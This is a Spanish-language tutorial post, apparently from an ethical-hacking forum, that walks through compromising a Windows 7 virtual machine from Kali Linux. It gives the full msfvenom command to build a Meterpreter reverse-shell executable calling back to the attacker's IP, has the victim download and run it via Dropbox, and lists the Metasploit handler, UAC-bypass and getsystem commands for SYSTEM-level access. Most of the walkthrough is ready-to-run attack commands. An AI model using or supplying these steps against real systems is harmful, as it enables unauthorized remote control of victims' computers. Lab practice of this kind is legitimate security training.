Ataque a windows mediante Kali Linux

Enviado por cristopher22 el Sáb, 08/06/2019 - 02:09
Ataque a windows mediante Kali Linux
Seguridad & Hacking Ético

cristopher huenuanca

Las máquinas virtuales de VMware a ocupar son Kali Linux y Windows 7, ademas se utilizara la plataforma Dropbox para subir el archivo y descargar el archivo en la máquina virtual Windows 7.

1. Como primer paso se debe ingresar el comando “ifconfig” para saber cuál es nuestra IP, en este caso la IP es 192.168.193.128 con mascara 255.255.255.0

.

2. A continuación, se debe ingresar el siguiente comando:

# msfvenom -p Windows/meterpreter/reverse_tcp --platform Windows -a x86 -f exe LHOST=192.168.193.128 LPORT=4444 -o virusvirus.exe

Mediante msfvenom se genera un exploit, con “-p” se selecciona el tipo de PAYLOAD para el ataque (Windows..), con “-f ” se selecciona el tipo de archivo (exe), con “-o” crea el archivo de salida (virusvirus.exe), ademas de indicar la IP propia (Kali) y el N° de puerto (Default 4444).

.

3. Se ingresa el comando “ls” para verificar que el archivo esta creado (virusvirus.exe)

.

4. Se verifica en los archivos de la carpeta personal que se encuentra el archivo creado anteriormente (virusvirus.exe)

,

5. Luego ese archivo se debe subir a una plataforma, en este caso se subió al Dropbox para ser descargado en la máquina virtual Windows 7 y el archivo debe ser ejecutado para así poder realizar el ataque.

.

6. Como siguiente paso se debe ingresar a metasploit framework de la maquina virtual Kali Linux

. ,

7.  A continuación se debe ingresar los siguientes comandos:

#Use multi/handler (para iniciar este proceso)
#set payload windows/meterpreter/reverse_tcp (cargar payload meterpreter para generar cmd reverse en la maquina a atacar)
#Set LHOST 192.168.193.128 (IP de la maquina que realizara el ataque)
#Set LPORT 4444 (Puerto por defecto)
#exploit (para correr la maquina)

.

8.  Luego ingresar los siguientes comandos:

# use exploit/Windows/local/bypassuac
# set payload windows/meterpreter/reverse_tcp
# set LHOST 192.168.193.128
# set SESSION 1
# set LPORT 80
# exploit

.

9. Luego se debe ingresar el comando “getsystem” para aumentar el privilegio y el comando Shell.
    Listo para realizar el ataque mediante un archivo creado en la maquina virtual Kali, descargado y ejecutado en la máquina virtual Windows 7

.

10. Para finalizar y para comprobar que los ataques se realizaran con éxito ingresamos el comando “calc” (calculadora) como prueba y en la maquina atacada Windows 7 se abre la calculadora, eso quiere decir que el ataque que se realizo fue exitoso.

     . .